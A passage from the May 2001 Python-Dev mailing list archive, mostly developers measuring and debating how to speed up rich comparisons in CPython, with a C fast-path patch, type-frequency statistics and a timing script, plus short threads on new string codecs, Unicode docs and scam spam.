is one lousy pointer check, and the answer will usually be-- provided we don't start stuffing code into *every* object's tp_richcompare slot! --"no, so I can go to tp_compare immediately". Coercions and richcmps are the oddball cases today. > The change here is what you'd do when you have both richcmp and > oldcomp; Python clearly mandates using richcmp. Yes, except you don't usually have both today and reality is exploitable . > In case this is not obvious (it wasn't to me): UserList will complain > about using the deprecated __cmp__, Sounds like a bug to me; if cmp is deprecated, that's also news to me. > and dictionaries will iterate over their elements differently. dicts didn't have a tp_richcompare slot before I added it last week, and because dicts can do a much faster and more-general job on Py_EQ and Py_NE than dict cmp (but on nothing else). I originally took away the tp_compare slot for dicts and lived to regret it -- it has both now. > Given that richcomp has to be tried first, this patch does the "common > case" at the earliest possible time, and with no overhead, except for > PyErr_Occurred call. The earliest *reasonable* time would be after a short block of new pointer checks while still inside PyObject_RichCompare(): I believe the usual case today is that the objects are of the same type, the type doesn't have a tp_richcompare slot, but does have a tp_compare slot. This covers at least ints, floats, longs and strings, where the overhead of a single function call is most often larger than the time it actually takes to compare the darned things. It's not important to, e.g., get to a dict comparison quickly, because comparing dicts is darned expensive even after we find the dict comparison routine. Ditto comparing instances or matrices etc. Optimizing for richcmps is optimizing the less important thing. BTW, tuples have a richcompare slot today and it's unclear that's a good idea. 
They do the same kind of Py_EQ/Py_NE "length check" you like for strings, and I'd be surprised if that didn't cost more than it saves. Unlike strings, whenever I compare tuples they *always* have the same size (e.g., think of all the decorator pattern ways tuples are used to augment sorts). OK, across a full run of the test suite, tuplerichcompare() was called about 162000 times, all but about 50 times with Py_EQ or Py_NE. The number of times this code block at the start bore fruit: if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) { /* Shortcut: if the lengths differ, the tuples differ */ PyObject *res; if (op == Py_EQ) res = Py_False; else res = Py_True; Py_INCREF(res); return res; } was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code just burned cycles. I want to move toward optimizations that save more than they cost <0.7 wink>. > ... > For strings, I would still special-case tp_richcompare: when tracing > calls to string_richcompare, I found that most calls with Py_EQ can > be decided by checking that the string lengths are not equal. I expect you'd also find that the current string_compare() usually decides they're not equal on the first character comparison (which *it* special-cases). So special-casing on length isn't a clear win over what's already done. But, if it is, bravo! Special-case the snot out of it without calling *any* string functions (merely calling string_richcompare likely costs a good deal more than comparing the lengths). 
more-measuring-less-guessing-ly y'rs - tim From thomas@xs4all.net Tue May 15 12:51:06 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 15 May 2001 13:51:06 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600 References: <200105150426.f4F4QVx01531@localhost.local> Message-ID: <20010515135106.A16811@xs4all.nl> On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote: > I thought I was th only one getting all these silly Nigerian scam spams. I > figured maybe they saw my name and decided to test on me (though they might > more cleverly have figured that a fellow Nigerian would be wise to the game). Actually, one of my colleagues informed me that this spam is in fact *very old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the Nigerian spam a mere week after getting the spam myself :) Scott (my colleague, not Adams) remembers first getting it by fax, 15 years ago, and again several years later. And not just one fax, but every single fax in the company, and lots more outside of the company. Apparently the telephone operator issued a warning to all customers not to respond to the fax. Still-sound-advice-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Tue May 15 13:10:16 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 14:10:16 +0200 Subject: [Python-Dev] Easy codec access Message-ID: <3B011CA8.9DDB4FC7@lemburg.com> I've just checked in a set of patches which implement the new .decode() method along with a couple of useful codecs. 
You can now do things like these: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' >>> "abcäöü".decode('latin-1') u'abc\xe4\xf6\xfc' >>> "abcäöü".decode('latin-1').encode('latin-1') 'abc\xe4\xf6\xfc' >>> "Hello World !".encode('rot13') 'Uryyb Jbeyq !' So the overall codec experience should be a much better one now. To see just how easy it is to write codecs, please have a look at the string codecs I added in this patch (e.g. zlib_codec.py or hex_codec.py). I am pretty sure that there are a lot more useful things in the standard lib which could benefit from these easy-to-use interfaces. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@pythonware.com Tue May 15 13:11:26 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Tue, 15 May 2001 14:11:26 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 References: <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl> Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff> thomas wrote: > Actually, one of my colleagues informed me that this spam is in fact > *very old* more info here: http://home.rica.net/alphae/419coal/index.htm "A Five Billion US$ (as of 1996, much more now) worldwide Scam which has run since the early 1980's under Successive Governments of Nigeria. "The Nigerian Scam is, according to published reports, the Third to Fifth largest industry in Nigeria." Cheers /F (highest offer this far: $155,000,000) From guido@digicool.com Tue May 15 16:27:31 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 10:27:31 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400." References: Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> > [Martin v. 
Loewis] > > Is this really exactly what Python would guarantee? I'm surprised that > > x==x would always be true, but x!=x might be true also. In a type where > > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > > I had expected that you'd reduced it to > > > > if (v == w && op == Py_EQ) /* then return Py_True */ > > if (v == w && op == Py_NE) /* then return Py_False */ [Tim] > I agree that would be more analogous to what PyObject_Compare() does. > > I'm not sure either make sense for rich comparisons; for example, under > IEEE-754 rules, a NaN must compare not-equal to everything, including > itself(!), and richcmps are the only hope Python users have of modeling that. > Doing those pointer checks before giving richcmps a chance would kill that > hope. Can we agree to drop this one until somebody produces stats saying > it's important? I have no reason to suspect that it is. PEP 207 is quite explicit that == and != are not to be assumed each other's complement. It is silent on the x==x issue but the PEP mentions IEEE 754 so I agree that this also shouldn't be cut short. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake@acm.org Tue May 15 16:29:10 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 15 May 2001 11:29:10 -0400 (EDT) Subject: [Python-Dev] Unicode docs In-Reply-To: References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com> Tim Peters writes: > The latter addresses several *fundamental* questions untouched by > the former, like whar are the datatypes of the arguments and the > result, what values does errors accept, and what do they mean? The > first blurb answers some more, like what's the default encoding, > and which exception is raised? Neither is complete on its own, but > the reference manual should have a complete answer to all such > questions. It doesn't have to go on at great length. 
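Tim asks about unicode(): the argument and result types, the accepted errors values, the default, and the exception raised. These questions can be answered concretely for the modern equivalent, bytes.decode() in Python 3. The following sketch is written against that API, not the 2001 unicode() builtin. It also includes the kind of round-trip example Tim asks for.

```python
raw = b"abc\xe4\xf6\xfc"  # 8-bit input is bytes; decoding yields str

# Round trip: Latin-1 maps each byte 0-255 to one code point, so it is lossless.
text = raw.decode("latin-1")
assert text == "abc\u00e4\u00f6\u00fc"
assert text.encode("latin-1") == raw

# errors= controls what happens on undecodable input; the default is "strict".
try:
    raw.decode("ascii")
except UnicodeDecodeError as exc:
    assert isinstance(exc, ValueError)  # UnicodeDecodeError subclasses ValueError
    print("strict:", exc.reason)        # ordinal not in range(128)

print("ignore:", raw.decode("ascii", "ignore"))           # abc
print("replace:", ascii(raw.decode("ascii", "replace")))  # 'abc\ufffd\ufffd\ufffd'
```

In Python 3 the default encoding for bytes.decode() is UTF-8, and 'replace' substitutes U+FFFD, as Andrew's description states.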
I've beefed up the description of the unicode() function by merging the information from AMK's document. > A round-trip example would be invaluable. > > If Fred wanted to incorporate a brief overview too, a light rework of > Andrew/Moshe's writeup would be an excellent start. I'd love to have a contribution from someone with more knowledge of what's there than me. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido@digicool.com Tue May 15 17:35:09 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 11:35:09 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200." <3B011CA8.9DDB4FC7@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com> > I've just checked in a set of patches which implement the new > .decode() method along with a couple of useful codecs. Cool! > To see just how easy it is to write codecs, please have > a look at the string codecs I added in this patch (e.g. > zlib_codec.py or hex_codec.py). I am pretty sure that there > are a lot more useful things in the standard lib which could > benefit from these easy-to-use interfaces. As an exercise, I added a quoted-printable codec. It was easy indeed! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@effbot.org Tue May 15 19:21:00 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Tue, 15 May 2001 20:21:00 +0200 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid> in case anyone has two hours to spare, and the right software, MIT's dynamic languages group has posted a quicktime video of their recent panel on language design.
http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html (what 1/2 should result in, why it's good to have both CPython and JPython, why whitespace is significant, why language design is perhaps more related to architecture than math, and lots of other goodies from Guy Steele and others) Cheers /F From nas@python.ca Tue May 15 19:51:20 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 15 May 2001 11:51:20 -0700 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200 References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> Message-ID: <20010515115120.A14357@glacier.fnational.com> Fredrik Lundh wrote: > in case anyone has two hours to spare, and the right software, > MIT's dynamic languages group has posted a quicktime video of > their recent panel on language design. > > http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html Does the streaming actually work for anyone? I've given up and started downloading the whole .mov files. Neil From martin@loewis.home.cs.tu-berlin.de Tue May 15 20:45:59 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 21:45:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> > more-measuring-less-guessing-ly y'rs - tim Producing numbers is easy :-) I've instrumented my version where string implements richcmp, and special-cases everything I can think of. Counting is done for running the test suite. With this, I get Calls to string_richcompare: 2378660 Calls with different types: 33992 (i.e.
one is not a string)
Calls with identical strings:    120517
Calls where lens decide !EQ:     1775716
----------------------------
Calls richcmp -> oldcomp:        448435
Total calls to oldcomp:          1225643
Calls oldcomp -> memcmp:         860174

So 5% of the calls are with identical strings, for which I can immediately decide the outcome. 75% can be decided in terms of the string lengths, which leaves ca. 19% for cases where lexicographical comparison is needed. In those cases, the first byte decides in 30%.

If I remove the test for "len decides !EQ", I get

#riches:         2358322
#riches_ni:      34108
#idents_decide:  102050
#lens_decide:    0
--------------------------------------
rest(computed):  2222164
#comps:          2949421
#memcmps:        917776

So still, ca. 30% can be decided by first byte. It still appears that the total number of calls to memcmp is higher when the length is not taken into consideration. To verify this claim, I've counted the cases where the length decides the outcome, and the cases where looking at the first byte would also have decided it:

lens_decide:                     1784897
lens_decide_firstbyte_wouldhave: 1671148

So in 6% of the cases, checking the length alone gives a decision which looking at the first byte doesn't; plus it saves a function call.

To support the thesis that Py_EQ is the common case for strings, I counted the various operations:

pyEQ:2271593 pyLE:9234 pyGE:0 pyNE:20470 pyLT:22765 pyGT:578

Now, that might be flawed since comparing strings for equality is extremely frequent in the testsuite. To give more credibility to the data, I also ran setup.py with my instrumented ./python:

riches:21640 riches_ni:76 riches_ni1:0 idents:2885 idents_decide:2885 lens_decide:9472 lens_decide_firstbyte_wouldhave:6223 comps:26360 memcmps:19224
pyEQ:20093 pyLE:46 pyGE:1 pyNE:548 pyLT:876 pyGT:0

That shows that optimizing for Py_NE is not worth it. With these data, I'll upload a patch to SF.
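The shortcut order Martin measured can be modelled in Python: identical objects first, then unequal lengths, then the first character, and only then a full memcmp-style compare. The following is a hypothetical sketch that classifies equality tests the way his counters do. It is not CPython's string_richcompare, and its Python-level overhead makes it useless for timing. The names classify_eq and string_eq are illustrative.

```python
from collections import Counter


def classify_eq(a: str, b: str) -> str:
    """Name the cheapest check that decides a == b."""
    if a is b:
        return "identical"           # same object: equal without looking
    if len(a) != len(b):
        return "length decides"      # different lengths cannot be equal
    if a[:1] != b[:1]:
        return "first char decides"  # differing first characters
    return "full compare"            # fall through to a memcmp-style scan


def string_eq(a: str, b: str) -> bool:
    """Equality test that applies the shortcuts in the order above."""
    kind = classify_eq(a, b)
    if kind == "identical":
        return True
    if kind in ("length decides", "first char decides"):
        return False
    return a == b


s = "spam"
pairs = [(s, s), ("spam", "eggs!"), ("spam", "ham!"), ("spam", "spat")]
print(Counter(classify_eq(a, b) for a, b in pairs))
```

Counting the categories over a real workload, as Martin did with his instrumented build, shows which shortcut pays for itself.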
Regards, Martin From tim@digicool.com Tue May 15 21:22:37 2001 From: tim@digicool.com (Tim Peters) Date: Tue, 15 May 2001 16:22:37 -0400 Subject: [Python-Dev] Comparison corner case Message-ID: Here from the tail end of a patch comment. If you believe the illustrated behavior is wrong, then I don't believe we gain anything from using the tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain for the latter is that it allows EQ/NE tuple comparison to work correctly on tuples containing elements that support only EQ/NE comparisons): """ BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, because it won't believe there's any difference unless Py_EQ returns false for some corresponding elements: >>> class C: ... def __lt__(x, y): return 1 ... __eq__ = __lt__ ... >>> C() < C() 1 >>> (C(),) < (C(),) 0 >>> That doesn't make sense -- provided you believe the defn. of C makes sense. """ From guido@digicool.com Tue May 15 22:36:57 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 16:36:57 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST." References: Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Tim wrote: > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ returns false > for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C makes sense. I think in this example the problem is with C, not with the tuple algorithm. The question is, what are you going to do otherwise? You could test for < first, == second -- but that means twice as many comparisons, and for reasonably-behaved items it makes no difference at all. 
--Guido van Rossum (home page: http://www.python.org/~guido/)
From martin@loewis.home.cs.tu-berlin.de Tue May 15 21:59:56 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 22:59:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course. But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately". Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types are most frequently compared. The first set of data is for running the Python testsuite.

riches       3040952   # Calls to PyObject_RichCompare
eqs          2828345   # Calls where the types are equal
String       2323122
Float         141507
Int           125187
Type           99477
Tuple          84503
Long           30325
Unicode        10782
Instance        9335
List            2997
None             383
Class            318
Complex          219
Dict              57
Array             49
WeakRef           34
Function          11
File              11
SRE_Pattern       10
CFunction          9
Lock               8
Module             1

So strings cover 82% of all the compare calls of equally-typed objects, followed by floats with 5%. Calls with equally-typed objects make up 93% of all richcompare calls.

Since this might give a blurred view of what is actually used in applications, I ran the PyXML testsuite with that python binary also. Leaving out types that are not used, I get

riches         88465
eqs            59279
String         48097
Int             5681
Type            3170
Tuple            760
List             492
Float            332
Instance         269
Unicode          243
None             225
SRE_Pattern        4
Long               3
Complex            3

The first observation here is that "only" 67% of the calls are with equally-typed objects. Of those, 80% are with strings, 9% with integers.

The last example is IDLE, where I just did an "import httplib", for fun.
riches            50923
eqs               49882
String            31198
Tuple              8312
Type               7978
Int                1456
None                600
SRE_Pattern         210
List                122
Instance              4
Float                 1
Instance method       1

Roughly the same picture: 97% calls with equally-typed objects, of those 62% strings, 3% integers. Notice the 15% for tuples and types, each.

So to speed-up the common case clearly means to speed-up string comparisons. If I'd need to optimize anything else afterwards, I'd look into type objects - most likely, they are compared for EQ, which can be done nicely and directly in a tp_richcompare also. Those two optimizations together would give a richcompare to 95% of the objects in the IDLE case.

Regards, Martin
From guido@digicool.com Tue May 15 23:41:12 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 17:41:12 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200." <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from. Is there lots of code that does frequent

assert type(x) == T

typechecking? Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)
From barry@digicool.com Tue May 15 22:51:00 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 17:51:00 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum writes:

GvR> I'm curious where the frequent comparisons of types come
GvR> from.

GvR> Is there lots of code that does frequent

GvR> assert type(x) == T

GvR> typechecking?

GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.
From jeremy@digicool.com Tue May 15 18:26:54 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
        <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes. I suppose the name led me in the wrong direction.
I had the silly idea that it only applied to instances <0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function. (Simple grep.) A total of 139 instances of this idiom.
A cursory scan suggests that most of the calls are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences. It again looks like comparisons against the string type
are the most common.

I can think of two common cases where an object is checked against the
string type. One is an interface that takes a file-like object or its
path. The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.
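Jeremy's two common cases can be written with isinstance() instead of type(obj) == type(''). The sketch assumes Python 3, with `str` as the string type and `io.StringIO` as a stand-in file-like object. `open_source` and `as_items` are hypothetical helper names, not library functions.

```python
import io

def open_source(path_or_file):
    """Accept either a filesystem path or an already-open file-like object."""
    if isinstance(path_or_file, str):
        return open(path_or_file)
    return path_or_file              # assume it is already file-like

def as_items(seq):
    """Treat a lone string as one item; any other iterable as its items."""
    if isinstance(seq, str):
        return [seq]
    return list(seq)

buf = io.StringIO("data")
print(open_source(buf).read())       # data
print(as_items("abc"))               # ['abc']
print(as_items(("a", "b")))          # ['a', 'b']
```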
Jeremy

From jeremy@digicool.com Tue May 15 18:41:58 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
        <20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I downloaded one of the files, but the QuickTime player I have on my
Windows box said it didn't understand the file format. I eventually
got the streaming version at the 100kbps to "work", where work meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation. Mat Hostetter, one of
the panelists, is my old roommate!

From barry@digicool.com Tue May 15 23:56:10 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
        <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
        <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes. I suppose the name led me in the
    JH> wrong direction. I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function. (Simple grep.) A total of 139
    JH> instances of this idiom. A cursory scan suggests that most of
    JH> the calls are things like type(obj) == type('').

Even without the forward-looking insight that types are classes, I
think type comparisons should have been done with `is' and not ==.
So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1, == is naturally slower than `is', but isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time

r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'

one()
two()
three()

From tim.one@home.com Wed May 16 00:49:03 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID:

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -c -r2.131 object.c
*** object.c    2001/05/11 03:36:45    2.131
--- object.c    2001/05/15 23:39:24
***************
*** 835,841 ****
          }
      }
      else {
!         res = do_richcmp(v, w, op);
      }
      compare_nesting--;
      return res;
--- 835,863 ----
          }
      }
      else {
!         cmpfunc f;
!         if (v->ob_type == w->ob_type
!             && RICHCOMPARE(v->ob_type) == NULL
!             && (f = v->ob_type->tp_compare) != NULL)
!         {
!             int c = (*f)(v, w);
!             if (c < 0 && PyErr_Occurred())
!                 res = NULL;
!             else {
!                 switch (op) {
!                 case Py_LT: c = c <  0; break;
!                 case Py_LE: c = c <= 0; break;
!                 case Py_EQ: c = c == 0; break;
!                 case Py_NE: c = c != 0; break;
!                 case Py_GT: c = c >  0; break;
!                 case Py_GE: c = c >= 0; break;
!                 }
!                 res = c ? Py_True : Py_False;
!                 Py_INCREF(res);
!             }
!         }
!         else
!             res = do_richcmp(v, w, op);
      }
      compare_nesting--;
      return res;

That's a local change to PyObject_RichCompare, taking a fast path for
most scalar types (which don't have richcmps but do have tp_compare
today). On my Win98 box reproducible timings are impossible, but it
obviously chops out layers and layers of function calls and redundant
tests when it triggers. That appears to be more often than not across
all apps I've tried, from 60% of PyObject_RichCompare calls to nearly
100%.

From tim.one@home.com Wed May 16 01:01:05 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID:

[Tim]
> BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise? You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior
is guaranteed by the language and how much is just
implementation-dependent fuzz. For a more vanilla example, I removed
the EQ/NE "lengths differ?" tuple richcmp early-exit test because I
never found code that made it trigger.
(but tons of code that gets there without triggering). But this has
semantic implications too: an implementation without the early exit
may call user-defined comparison routines that raise exceptions when
comparing tuples of different lengths now. Do you care? (I don't.)

From tim.one@home.com Wed May 16 01:37:56 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID:

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app. I have apps where int compares
*overwhelmingly* dominate, others where float compares do, many where
string compares do, and the last code I wrote for Zope spends most of
its (very substantial) time doing lookups of "object ids" in dicts.
In Python terms, those are Pythong lon (unbounded) ints today, and
potentially Python ints on 64-bit boxes, and that's another case where
ceval.c's special-casing of int compares is impotent. Heck, sort a
large homogeneous array once, and whatever element type that array has
will likely dominate comparisons for the whole app! That's why I'm so
keen to chop out a half dozen layers of blubber for *all* types that
don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches          3040952   # Calls to PyType_RichCompare
> eqs             2828345   # Calls where the types are equal
>
> String          2323122
> Float           141507
> Int             125187
> Type            99477
> Tuple           84503
> Long            30325
> Unicode         10782
> Instance        9335
> List            2997
> None            383
> Class           318
> Complex         219
> Dict            57
> Array           49
> WeakRef         34
> Function        11
> File            11
> SRE_Pattern     10
> CFunction       9
> Lock            8
> Module          1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%.
> Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today. The
tuples are likely composed of simple scalar types, and the latter
benefit too. But as above, we can't say anything in advance about the
*specific* types a given app is going to compare most often. There is
no "typical app" in that respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches          88465
> eqs             59279
>
> String          48097
> Int             5681
> Type            3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern     4
> Long            3
> Complex         3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to
figure out why <0.9 wink>: there's no scheme on the horizon that will
speed mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for
> fun.
>
> riches          50923
> eqs             49882
>
> String          31198
> Tuple           8312
> Type            7978
> Int             1456
> None            600
> SRE_Pattern     210
> List            122
> Instance        4
> Float           1
> Instance method 1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types
compared most often do have tp_compare but not tp_richcompare
functions. The test suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.
Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting. Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including
at least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the
cmp() function heavily. That path has also gotten bloated, and tries
each of Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them
to say "yes". It does this now even if the tp_compare slot is defined.
The only thing that's saving cmp()-slinging code from major sloth now
is that the basic types do *not* implement tp_richcompare, so
try_rich_to_3way_compare gets out early (before doing the three-way
Py_EQ etc dance). But give the basic scalar types richcmp functions,
and cmp() will slow down a lot (unless more hacks are added to stop
that).

From greg@cosc.canterbury.ac.nz Wed May 16 02:58:05 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
